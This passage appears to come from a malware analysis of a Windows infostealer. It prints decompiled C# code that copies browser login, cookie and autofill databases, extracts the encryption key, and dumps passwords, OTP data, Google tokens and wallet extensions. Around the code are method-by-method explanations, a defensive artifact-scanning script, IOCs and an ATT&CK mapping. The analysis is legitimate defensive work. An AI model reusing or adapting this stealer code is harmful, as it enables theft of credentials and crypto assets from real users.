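            live.setdefault(c.host.lstrip("."), set()).add(c.name)
    return live


# Constructed dump content; values are placeholders, not real cookies.
SAMPLE_DUMP = "\n".join([
    ".example.com\tTrue\t/\tTrue\t1900000000\tsid\tPLACEHOLDER1",
    "mail.example.org\tFalse\t/\tTrue\t1500000000\tauth\tPLACEHOLDER2",   # expired
    ".shop.example.net\tTrue\t/cart\tFalse\t1900000000\tcart\tPLACEHOLDER3",
    "garbage line without the expected columns",
])

if __name__ == "__main__":
    found = parse_dump(SAMPLE_DUMP)
    # 2024-05-01 00:00 UTC as the assumed time of compromise
    for host, names in sorted(live_sessions(found, datetime(2024, 5, 1)).items()):
        print(host, sorted(names))
```

Session cookies carry an expiry of 0 in this layout and so never appear as live here; a dump that contains them should be treated as covering every site the profile was logged into at the time, regardless of expiry.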
In this gathering class, the stealer collects data from various applications, likely within a Windows environment. The code has several methods with names in a mix of English and what seems to be a Slavic language.
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Threading;
namespace Ishimsky
{
// Token: 0x02000008 RID: 8
internal class Nurminsky
{
// Token: 0x06000011 RID: 17 RVA: 0x0000272C File Offset: 0x0000092C
public static string RandomName(int NameLength)
{
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random((int)DateTime.Now.Ticks);
while (0 < NameLength--)
{
string text = "abcdefghijklmnopqrstuvwxyz";
stringBuilder.Append(text[random.Next(text.Length)]);
Thread.Sleep(1);
}
return stringBuilder.ToString();
}
// Token: 0x06000012 RID: 18 RVA: 0x0000279C File Offset: 0x0000099C
public static string Mumia()
{
List<string> p = Blizkiy.MOS("SELECT * FROM Win32_Processor", "Name", "NumberOfCores", "Cores - ");
List<string> g = Blizkiy.MOS2("root\\CIMV2|SELECT * FROM Win32_VideoController", "AdapterRAM", "Name");
FiveW.SINF(ModelGeev.patriarh + "\\INFS.txt", "sinf|null", g, p);
return "Bolshoi Brat";
}
// Token: 0x06000013 RID: 19 RVA: 0x00002800 File Offset: 0x00000A00
public static string TraxBabax()
{
Directory.CreateDirectory(ModelGeev.patriarh + "\\");
Directory.CreateDirectory(ModelGeev.patriarh + "\\Wallets");
Directory.CreateDirectory(ModelGeev.patriarh + "\\Cookies");
Directory.CreateDirectory(ModelGeev.patriarh + "\\Restore");
Directory.CreateDirectory(ModelGeev.patriarh + "\\Autofill");
return "GolovnoyOtdel";
}
// Token: 0x06000014 RID: 20 RVA: 0x00002880 File Offset: 0x00000A80
public static string Dalma(string profilePath)
{
string text = string.Empty;
try
{
List<string> list = FilveM.LocTester(profilePath, new string[]
{
"Local State",
"LocalPrefs.json"
});
foreach (string path in list)
{
bool flag = File.Exists(path);
if (flag)
{
try
{
string text2 = File.ReadAllText(path);
bool flag2 = !string.IsNullOrEmpty(text2);
if (flag2)
{
text = FiveW.RGX(text2, "\"encrypted_key\":\"", "\"");
bool flag3 = !string.IsNullOrEmpty(text);
if (flag3)
{
return text;
}
}
}
catch (Exception)
{
}
}
}
}
catch
{
}
return text;
}
// Token: 0x06000015 RID: 21 RVA: 0x00002970 File Offset: 0x00000B70
public static List<string> Anpelgolds(IList<string> pfs)
{
List<string> list = new List<string>();
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
foreach (string text in pfs)
{
try
{
foreach (string text2 in FilveM.DirTester(text.Replace("%PAPAGEY%", folderPath), new string[]
{
"Login Data",
"Web Data",
"Cookies"
}))
{
string text3 = string.Empty;
string fullName = new FileInfo(text2).Directory.FullName;
bool flag = fullName.Contains("Opera GX Stable");
bool flag2 = flag;
if (flag2)
{
text3 = "Opera GX Stable";
}
else
{
text3 = (text2.Contains("Roaming") ? FilveM.ChrRm(fullName) : FilveM.ChrLm(fullName));
}
text3 = text3[0].ToString().ToUpper() + text3.Remove(0, 1);
string str = FilveM.CGN(fullName);
text3 = text3 + "_" + str;
string text4 = Nurminsky.Dalma(text.Replace("%PAPAGEY%", folderPath));
string text5 = Nurminsky.RandomName(8);
Directory.CreateDirectory(ModelGeev.patriarh + "\\" + text3);
string text6 = Path.Combine(ModelGeev.patriarh + "\\", text3);
string text7 = Nurminsky.RandomName(8);
bool flag3 = text2.Contains("Login Data");
if (flag3)
{
byte[] bytes = File.ReadAllBytes(text2);
File.WriteAllBytes(text6 + "\\" + text7 + ".loda", bytes);
list.Add(string.Concat(new string[]
{
text6,
"\\",
text7,
".loda|",
text3,
"|",
text4,
"|",
fullName
}));
}
else
{
bool flag4 = text2.Contains("Web Data");
if (flag4)
{
byte[] bytes2 = File.ReadAllBytes(text2);
File.WriteAllBytes(text6 + "\\" + text7 + ".weda", bytes2);
list.Add(string.Concat(new string[]
{
text6,
"\\",
text7,
".weda|",
text3,
"|",
text4,
"|",
fullName
}));
}
else
{
bool flag5 = text2.Contains("Cookies");
if (flag5)
{
byte[] bytes3 = File.ReadAllBytes(text2);
File.WriteAllBytes(text6 + "\\" + text7 + ".coco", bytes3);
list.Add(string.Concat(new string[]
{
text6,
"\\",
text7,
".coco|",
text3,
"|",
text4,
"|",
fullName
}));
}
}
}
}
}
catch
{
}
}
return list;
}
// Token: 0x06000016 RID: 22 RVA: 0x00002D00 File Offset: 0x00000F00
public static string OblaGlobal(IList<string> list)
{
foreach (string text in list)
{
string[] array = text.Split(new char[]
{
'|'
});
bool flag = File.Exists(array[0]);
if (flag)
{
string fullName = new FileInfo(array[0]).Directory.FullName;
Directory.Delete(fullName, true);
}
}
return "TERQA";
}
// Token: 0x06000017 RID: 23 RVA: 0x00002D90 File Offset: 0x00000F90
public static string Armyanec01(IList<string> list)
{
try
{
List<string> list2 = new List<string>();
foreach (string text in list)
{
List<string> list3 = new List<string>();
List<string> list4 = new List<string>();
List<string> list5 = new List<string>();
List<string> list6 = new List<string>();
List<string> list7 = new List<string>();
string[] array = text.Split(new char[]
{
'|'
});
List<string> list8 = Bulkonit.Cerulecus(array[3]);
List<string> list9 = Bulkonit.CORMAGIDON(array[3]);
bool flag = array[0].Contains(".coco");
if (flag)
{
list3 = Bulkonit.DaritMolodost(array[0], array[2]).Item1;
list4 = Bulkonit.DaritMolodost(array[0], array[2]).Item2;
}
else
{
bool flag2 = array[0].Contains(".weda");
if (flag2)
{
bool flag3 = !array[1].ToLower().Contains("microsoft");
if (flag3)
{
list5 = Bulkonit.CaptuToto(array[0], array[2]);
}
list6 = Bulkonit.Pidofilio(array[0], array[2]);
}
else
{
bool flag4 = array[0].Contains(".loda");
if (flag4)
{
list7 = Bulkonit.Chapap(array[0], array[2]);
}
}
}
ModelGeev.c += list3.Count;
ModelGeev.p += list7.Count;
ModelGeev.a += list6.Count;
ModelGeev.t += list5.Count;
ModelGeev.e += list8.Count;
ModelGeev.o += list9.Count;
Nurminsky.sosok++;
ModelGeev.Rukavica = string.Concat(new string[]
{
ModelGeev.c.ToString(),
"|",
ModelGeev.p.ToString(),
"|",
ModelGeev.t.ToString(),
"|",
ModelGeev.a.ToString(),
"|",
ModelGeev.e.ToString(),
"|",
ModelGeev.o.ToString()
});
bool flag5 = list7.Count >= 1;
if (flag5)
{
FiveW.Cliator(ModelGeev.patriarh + "\\AllPws.txt", "pwd|" + array[1], list7);
}
bool flag6 = list3.Count >= 1;
if (flag6)
{
FiveW.Cliator(string.Concat(new string[]
{
ModelGeev.patriarh,
"\\Cookies\\",
array[1],
"[",
Nurminsky.sosok.ToString(),
"].txt"
}), "cookieold|null", list3);
}
bool flag7 = list4.Count >= 1;
if (flag7)
{
FiveW.Cliator(string.Concat(new string[]
{
ModelGeev.patriarh,
"\\Cookies\\",
array[1],
"[",
Nurminsky.sosok.ToString(),
"] FOR LINKING YT.txt"
}), "cookieold|null", list4);
}
bool flag8 = list6.Count >= 1;
if (flag8)
{
FiveW.Cliator(string.Concat(new string[]
{
ModelGeev.patriarh,
"\\Autofill\\[Extension]",
array[1],
"[",
Nurminsky.sosok.ToString(),
"].txt"
}), "autofill|null", list6);
}
bool flag9 = list5.Count >= 1;
if (flag9)
{
FiveW.Cliator(ModelGeev.patriarh + "\\Restore\\[%GoogleID%]" + array[1] + ".txt", "gtoken|null", list5);
}
bool flag10 = list9.Count >= 1;
if (flag10)
{
FiveW.Cliator(ModelGeev.patriarh + "\\OTP " + array[1] + ".txt", "otp|null", list9);
}
bool flag11 = list8.Count >= 1;
if (flag11)
{
FiveW.Wariator(ModelGeev.patriarh + "\\Wallets\\", "ext|" + array[1], list8);
}
}
}
catch
{
}
try
{
bool flag12 = string.IsNullOrEmpty(ModelGeev.Rukavica);
if (flag12)
{
ModelGeev.Rukavica = "0|0|0|0|0|0";
}
Nurminsky.Mumia();
}
catch
{
}
return "You Not Last Actual Version";
}
// Token: 0x04000007 RID: 7
private static int sosok;
}
}
RandomName(int NameLength):
- Generates a random string of lowercase letters with a specified length.
- Uses a StringBuilder for efficiency, and includes a Thread.Sleep(1) to ensure varied results based on timing.
Mumia():
- Interacts with Windows Management Instrumentation (WMI) to gather processor and video controller information.
- It appears to save this information to a file (though the implementation of FiveW.SINF is not provided).
TraxBabax():
- Creates several directories under a specified path (ModelGeev.patriarh), which likely serves as a data storage or workspace location.
Dalma(string profilePath):
- Reads specific files from a given profile path to extract an “encrypted key” from JSON content.
Anpelgolds(IList<string> pfs):
- Processes a list of paths to locate and handle data files (like “Login Data”, “Web Data”, and “Cookies”) across different browsers.
- Saves the contents into new files with different extensions based on their types.
OblaGlobal(IList<string> list):
- Deletes directories associated with the paths specified in the list, indicating a cleanup function.
Armyanec01(IList<string> list):
- This function handles the processing of gathered data, categorizing them based on their type and saving them to specific files based on the data type.
- It also collects statistics about the number of items processed.
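As a defender-side triage check added here (not code from the page or from the stealer), the Python script below walks a suspected working directory and flags the artifact names the decompiled Anpelgolds/Armyanec01 code above produces: staged database copies with the .loda/.weda/.coco extensions and an 8-letter random name, and the result files AllPws.txt, Cookies\<name>[n].txt, Autofill\[Extension]<name>[n].txt, Restore\[%GoogleID%]<name>.txt, OTP <name>.txt and Wallets\. The directory layout it builds for the demonstration is constructed sample data.

```python
import re
import tempfile
from pathlib import Path

# Anpelgolds copies "Login Data", "Web Data" and "Cookies" to an 8-letter random name with these extensions.
STAGED_EXT = {".loda": "Login Data", ".weda": "Web Data", ".coco": "Cookies"}
# Result files that Armyanec01 writes through FiveW.Cliator / FiveW.Wariator (names as on the page).
RESULT_PATTERNS = [
    (re.compile(r"^AllPws\.txt$"), "credential dump"),
    (re.compile(r"^Cookies/.+\[\d+\]( FOR LINKING YT)?\.txt$"), "cookie dump"),
    (re.compile(r"^Autofill/\[Extension\].+\[\d+\]\.txt$"), "autofill dump"),
    (re.compile(r"^Restore/\[%GoogleID%\].+\.txt$"), "Google token dump"),
    (re.compile(r"^OTP .+\.txt$"), "OTP dump"),
    (re.compile(r"^Wallets/"), "wallet extension dump"),
]

def scan_staging_dir(root: str) -> list[tuple[str, str]]:
    """Walk root and return (relative posix path, finding) pairs for stealer artifacts."""
    findings = []
    root_path = Path(root)
    for path in sorted(root_path.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root_path).as_posix()  # "/" separators on every OS
        ext = path.suffix.lower()
        if ext in STAGED_EXT and re.fullmatch(r"[a-z]{8}", path.stem):  # RandomName(8) output
            findings.append((rel, f"staged copy of browser '{STAGED_EXT[ext]}' file"))
            continue
        for pattern, label in RESULT_PATTERNS:
            if pattern.search(rel):
                findings.append((rel, label))
                break
    return findings

def scan_constructed_sample() -> list[tuple[str, str]]:
    """Build a constructed stealer-style working directory in a temp dir and scan it."""
    layout = {  # constructed sample files, not real stealer output
        "Chrome_Default/abcdefgh.loda": b"SQLite format 3\x00",
        "AllPws.txt": b"pwd|Chrome_Default\n",
        "Cookies/Chrome_Default[1] FOR LINKING YT.txt": b"cookieold|null\n",
        "Restore/[%GoogleID%]Chrome_Default.txt": b"gtoken|null\n",
        "OTP Chrome_Default.txt": b"otp|null\n",
        "notes/readme.txt": b"unrelated file, must not be flagged\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, data in layout.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(data)
        return scan_staging_dir(tmp)
```

Point scan_staging_dir at a user's Temp directory (or a forensic image mount) to list matches; note that OblaGlobal deletes the staging directories after processing, so the staged copies may only survive in backups or volume shadow copies.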
The stealer drops the payload at this path:
C:\Users\Admin\AppData\Local\Temp\download.exe
Contacted IP address: 104.21.52.67
Port: 443
ATT&CK:
Execution:
- Windows Management Instrumentation (T1047): access WMI data in .NET
Defense Evasion:
- Obfuscated Files or Information (T1027): encrypt data using DPAPI; encrypt or decrypt data via BCrypt; encode data using Base64
- Deobfuscate/Decode Files or Information (T1140): decode data using Base64 in .NET
Discovery:
- System Information Discovery (T1082): get OS version in .NET; get number of processor cores; query environment variable; get hostname
- File and Directory Discovery (T1083): check if the file exists; get the common file path; check if the directory exists; enumerate files on Windows
- Process Discovery (T1057): enumerate processes; find the process by name
- Software Discovery (T1518): enumerate processes
Collection:
- Data from Information Repositories (T1213): reference WMI statements